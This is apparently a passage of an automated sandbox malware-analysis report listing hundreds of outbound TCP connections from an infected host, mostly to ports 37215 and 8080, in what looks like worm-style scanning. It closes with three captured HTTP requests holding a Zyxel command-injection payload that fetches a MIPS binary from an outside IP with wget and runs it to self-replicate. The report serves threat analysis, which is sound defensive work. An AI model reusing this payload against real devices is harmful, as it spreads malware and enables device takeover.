            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.4.58.228:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.224.129.101:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.102.32.147:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 107.226.25.59:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 164.39.115.45:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.144.117.121:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.32.121.173:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.160.112.191:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.199.11.28:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.87.252.202:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.203.155.144:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.224.209.51:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.33.254.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 208.227.191.56:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.104.154.86:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.137.108.60:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.6.39.162:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 147.46.224.158:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.12.231.100:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.210.177.207:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.146.122.157:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.129.93.145:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.96.120.4:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.36.102.56:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.213.91.228:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.199.45.138:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.83.77.110:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.228.37.1:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 200.184.135.16:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 132.249.195.71:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.211.247.197:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 105.134.86.201:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.42.70.186:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 70.207.97.144:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.4.104.203:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 132.226.55.191:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.59.48.153:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.233.91.71:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.113.245.149:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.143.183.130:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.45.142.211:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.154.252.157:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.10.14.24:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.35.213.31:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.121.184.192:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 37.55.60.182:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.251.31.5:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.69.117.1:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.210.208.27:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.167.68.34:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.190.25.79:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.134.202.250:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.116.1.11:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.75.195.255:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.161.16.2:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 191.112.83.15:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.251.170.101:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.162.235.3:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.118.22.7:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.246.210.41:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.96.207.3:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.140.32.100:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 210.45.172.237:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.76.47.151:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 155.92.28.58:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.31.74.249:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.1.220.228:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.191.39.111:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 107.141.207.26:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.154.88.179:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.92.205.79:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.7.228.42:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.29.41.151:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.220.74.102:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.24.87.172:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.70.46.208:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.129.187.27:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.50.121.199:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 223.87.202.163:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.219.42.1:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 141.133.172.119:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 139.48.163.250:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.16.24.88:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 183.17.36.184:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.102.245.102:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.247.35.105:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.41.203.251:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.27.157.15:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.216.110.72:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.126.179.37:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.196.60.212:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.177.63.0:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.166.173.144:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.101.130.31:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.165.235.6:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.110.170.62:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.213.94.203:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.110.94.191:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.7.218.88:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 54.177.35.219:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.231.239.245:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.249.183.245:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 2.117.245.219:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 194.204.144.12:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.204.36.56:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 157.168.239.179:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.85.250.79:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 197.84.77.98:37215
            Source: global trafficTCP traffic: 192.168.2.13:57562 -> 41.130.76.96:37215
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 59.143.249.46:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 37.12.157.84:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 88.182.80.43:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 212.181.161.211:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 204.32.223.3:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 67.29.51.25:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 178.90.201.46:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 160.204.163.161:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 183.209.167.71:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 186.31.69.107:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 65.242.123.183:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 177.208.238.46:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 155.214.15.38:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 213.16.247.22:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 142.252.53.247:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 107.138.211.83:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 162.37.242.81:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 60.128.25.241:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 38.111.34.161:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 150.87.115.20:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 120.2.23.199:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 89.36.255.179:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 106.244.33.64:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 51.148.130.13:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 90.9.219.73:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 212.78.38.129:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 32.187.225.41:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 59.81.74.127:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 103.176.175.45:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 146.216.200.138:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 195.41.1.74:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 186.142.78.109:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 79.32.93.87:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 86.83.186.227:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 206.110.128.232:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 167.49.251.83:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 68.15.201.226:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 176.53.166.185:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 142.244.25.253:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 218.237.243.104:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 117.242.237.253:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 130.16.3.49:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 134.240.237.95:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 50.37.112.172:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 143.255.23.14:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 211.161.62.130:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 212.36.215.31:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 80.87.157.154:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 92.223.122.171:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 205.222.52.219:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 97.152.69.154:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 58.28.79.233:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 41.61.134.160:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 100.249.136.38:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 25.200.56.90:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 197.162.75.48:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 133.125.235.47:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 46.166.109.78:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 67.197.7.26:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 46.6.221.244:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 180.61.19.43:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 136.86.22.143:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 216.214.255.228:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 216.25.87.183:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 175.2.78.165:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 198.249.125.167:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 20.58.223.165:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 182.98.40.98:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 212.47.153.24:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 160.207.204.139:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 73.219.84.77:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 156.182.83.4:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 68.131.187.34:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 166.130.247.225:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 206.204.134.159:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 14.255.8.94:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 2.81.72.232:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 141.103.17.125:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 34.40.109.228:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 69.26.219.182:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 91.83.41.153:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 184.23.171.103:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 163.70.59.226:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 190.180.217.181:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 141.28.65.110:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 166.31.226.250:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 38.233.153.18:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 57.53.251.29:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 203.226.60.51:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 111.125.27.150:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 190.28.128.134:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 59.115.31.194:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 72.188.43.64:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 59.105.254.218:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 34.12.153.211:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 4.106.188.251:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 131.87.38.93:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 194.245.17.131:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 42.31.245.62:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 150.160.145.135:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 138.249.131.255:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 159.122.245.159:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 71.169.242.9:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 8.111.175.219:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 4.50.209.68:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 134.5.65.249:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 188.254.85.127:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 110.11.72.1:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 74.109.87.216:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 139.247.165.96:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 217.133.67.208:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 130.97.166.84:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 61.193.137.85:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 220.83.135.195:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 121.19.83.169:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 75.184.5.57:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 4.144.88.116:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 83.202.165.27:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 79.103.198.108:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 157.125.61.185:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 120.159.164.152:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 145.169.197.176:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 181.141.6.208:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 9.33.238.203:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 9.211.157.227:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 87.210.171.189:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 72.45.212.219:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 109.54.111.76:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 148.240.37.125:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 207.36.209.52:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 211.100.215.104:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 124.167.87.17:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 223.21.221.220:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 8.219.26.231:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 147.67.200.1:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 25.40.66.209:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 198.83.247.171:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 99.153.143.52:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 199.79.8.247:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 216.244.76.218:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 177.156.255.249:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 62.109.150.168:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 177.142.173.127:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 178.51.205.86:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 221.247.6.27:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 125.16.130.35:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 96.115.116.242:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 44.218.104.58:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 85.37.34.59:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 51.103.18.30:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 202.127.167.44:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 75.243.228.86:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 176.45.159.152:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 182.0.255.35:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 140.46.16.72:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 124.52.56.171:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 218.127.145.135:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 134.233.237.71:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 91.226.181.173:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 116.51.215.107:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 166.70.216.77:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 75.41.11.95:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 135.118.209.123:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 106.86.236.85:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 87.49.253.198:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 217.113.2.155:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 191.175.97.135:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 34.211.45.85:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 151.250.195.189:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 23.104.107.142:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 31.72.169.188:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 175.61.127.185:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 68.82.191.240:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 119.143.245.50:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 95.64.240.182:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 120.1.140.244:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 110.75.222.196:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 166.198.117.223:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 44.213.18.217:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 137.65.128.51:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 180.26.173.128:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 42.239.241.111:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 9.137.178.106:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 145.86.134.191:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 84.196.234.209:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 210.54.192.112:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 125.94.234.175:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 74.2.68.39:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 4.141.184.221:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 161.253.35.104:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 139.234.187.176:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 123.104.188.226:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 189.136.245.109:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 54.224.189.211:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 42.123.187.190:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 174.191.73.156:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 121.74.218.103:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 163.154.141.43:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 64.8.1.32:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 186.88.24.167:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 176.200.190.151:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 171.144.11.109:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 128.182.21.151:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 91.37.94.161:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 151.18.53.40:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 95.59.230.64:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 139.242.169.235:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 53.31.213.187:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 13.13.99.252:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 91.219.114.157:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 191.148.214.155:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 20.28.228.163:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 120.75.159.84:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 1.235.55.155:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 118.106.28.234:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 71.196.202.189:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 159.28.71.158:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 185.42.121.26:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 20.137.132.4:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 81.234.131.197:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 93.108.110.124:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 141.77.62.239:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 107.50.67.21:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 64.100.192.57:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 37.33.72.108:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 112.70.236.243:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 183.194.219.160:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 72.111.230.77:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 112.64.9.2:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 190.177.181.151:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 31.159.47.175:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 138.63.226.127:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 137.19.68.65:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 84.136.190.84:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 27.32.118.67:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 149.223.205.209:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 75.110.125.63:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 20.203.40.97:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 223.59.147.220:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 1.165.170.166:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 151.248.252.167:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 104.245.218.112:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 186.11.116.106:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 101.121.9.195:8080
            Source: global trafficTCP traffic: 192.168.2.13:60890 -> 142.189.131.233:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
